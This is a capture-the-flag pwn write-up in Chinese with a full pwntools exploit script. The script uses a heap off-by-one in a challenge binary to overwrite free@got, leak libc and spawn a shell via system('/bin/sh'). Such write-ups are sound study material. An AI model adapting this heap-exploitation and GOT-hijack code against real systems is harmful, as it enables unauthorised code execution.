漏洞点
off-by-one漏洞
攻击思路
由于程序没有show功能，所以无法直接通过unsortedbin泄露libc出来。
size和chunk是连在一起的，可以在此处伪造一个chunk，然后申请到这个chunk，就可以修改chunk为got表地址，可以修改free_got为puts，然后泄露libc地址，再修改为system即可。
EXP
from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys

# Process-wide pwntools settings: 64-bit Linux target. The 'debug' log level
# echoes every byte sent to / received from the target, leaked addresses
# included, so the console transcript is itself sensitive output.
context(os='linux', arch='amd64', log_level='debug')
# Spawn debugger / interactive panes as a horizontal tmux split.
context.terminal = ["tmux", "splitw", "-h"]

# 1 -> drive the local './pwn' binary, 0 -> talk to the remote sandbox instance.
debug = 1

p = process('./pwn') if debug else remote('challenge-d29d3112d3d2e499.sandbox.ctfhub.com', 24413)
# The local binary is loaded in both modes; it only supplies PLT/GOT symbols.
elf = ELF('./pwn')
# Thin I/O wrappers around the pwntools tube `p`. Each one forwards to `p`
# unchanged; they exist only to keep the interaction script short.
def s(data):
    """Send `data` as-is."""
    return p.send(data)


def sa(text, data):
    """Wait until `text` arrives, then send `data`."""
    return p.sendafter(text, data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until `text` arrives, then send `data` plus a newline."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to `num` bytes."""
    return p.recv(num)


def rl(text):
    """Receive everything up to and including `text`."""
    return p.recvuntil(text)


def pr(num=4096):
    """Receive up to `num` bytes and write them straight to stdout."""
    return sys.stdout.write(p.recv(num))


def inter():
    """Hand the tube over to the operator."""
    return p.interactive()


def l32():
    # Read until the first 0xf7 byte, then unpack the last 4 bytes as a u32.
    return u32(p.recvuntil('\xf7')[-4:].ljust(4, '\x00'))


def l64():
    # Read until the first 0x7f byte, then zero-extend the last 6 bytes to a u64.
    return u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))


def uu32():
    """Receive exactly 4 bytes and unpack them as a u32."""
    return u32(p.recv(4).ljust(4, '\x00'))


def uu64():
    """Receive exactly 6 bytes, zero-extend to 8, and unpack as a u64."""
    return u64(p.recv(6).ljust(8, '\x00'))


def int16(data):
    """Parse `data` as a base-16 integer."""
    return int(data, 16)


def lg(s, num):
    """Log `num` as a hex value under the label `s` via p.success()."""
    return p.success('%s -> 0x%x' % (s, num))
# Symbol table of the target's C library; the hard-coded leak offset used
# later is only valid for this exact build.
libc = ELF('./libc-2.23.so')


def _choose(option):
    """Answer the program's "Choice:" menu prompt with `option`."""
    rl("Choice:")
    sl(option)


def add(size):
    """Menu option 1 with a size argument: the program's allocate command."""
    _choose('1')
    rl("Size: ")
    sl(str(size))


def delete(index):
    """Menu option 3: release the entry stored at `index`."""
    _choose('3')
    rl("Index: ")
    sl(str(index))


def edit(index, content):
    """Menu option 2: send `content` as the new data of entry `index`."""
    _choose('2')
    rl("Index: ")
    sl(str(index))
    rl("Content: ")
    sl(content)
# --- heap set-up ---------------------------------------------------------------
# NOTE(review): every call below depends on the heap state left by the ones
# before it; the sequence is order-sensitive and must not be reordered.
# NOTE(review): `p64(...) + '\xe1'` concatenates bytes with a str, which only
# works under Python 2 pwntools -- TODO confirm the intended interpreter.
add(0x10)
add(0x18)
add(0x60)
add(0x60)
pause()   # pwntools pause(): blocks until the operator continues (debugger attach point)
for i in range(22):
    add(0x48)
edit(10, '/bin/sh\x00')   # entry 10 is later passed to free(); see the final delete()
add(0x70)
# 25 bytes into the 0x18-byte entry 1: the 24 zero bytes fill it and the single
# trailing 0xe1 spills one byte past it -- this is the off-by-one the write-up
# describes, used to plant a size byte.
edit(1, p64(0)*3+'\xe1')
delete(2)
add(0x60)
add(0x60)
delete(3)
delete(2)
delete(27)
add(0x60)
# Absolute address taken from the write-up; what lives at 0x602120 is not shown
# on this page -- TODO confirm against the binary before reusing.
edit(2, p64(0x602120))
add(0x60)
add(0x60)
add(0x60)
# Writes free()'s GOT slot address into entry 28; per the write-up this is what
# makes a later edit of entry 0 land on free@got -- verify against the program.
# Full RELRO (read-only GOT) is the standard mitigation that blocks this step.
edit(28, p64(0x60)+p64(0)+p64(elf.got['free']))
# 73 bytes into a 0x48-byte entry: a second single-byte (0xa1) overflow.
edit(4, p64(0)*9+'\xa1')
delete(5)
# --- libc leak and GOT rewrite --------------------------------------------------
add(0x48)
add(0x10)
# Inline copy of edit(0, ...). The only difference from edit() is the prompt
# string "Content: \n" (with a newline); NOTE(review): presumably the program
# prints a newline after the prompt at this point -- confirm against its output.
rl("Choice:")
sl('2')
rl("Index: ")
sl('0')
rl("Content: \n")
# Per the write-up, entry 0 now aliases the GOT: free@got <- puts@plt. The
# second qword presumably covers the next GOT slot (printf), keeping it on its
# own PLT stub -- the slot layout is not shown on this page.
sl(p64(elf.plt['puts'])+p64(elf.plt['printf']))
# With free() routed to puts(), releasing entry 6 prints its contents; the
# write-up treats the first 6 bytes as a libc pointer.
delete(6)
libc_leak = uu64()
# Hard-coded offset; only valid for the bundled libc-2.23.so.
libc_base = libc_leak-0x3c4b78
lg("libc_base", libc_base)
# Same write again, now pointing free@got at system() in the resolved libc.
rl("Choice:")
sl('2')
rl("Index: ")
sl('0')
rl("Content: ")
sl(p64(libc_base+libc.sym['system'])+p64(elf.plt['printf']))
# Entry 10 was filled with '/bin/sh\x00' during set-up, and free@got now holds
# system(); releasing it is the final step of the write-up.
delete(10)
inter()   # hand the tube over to the operator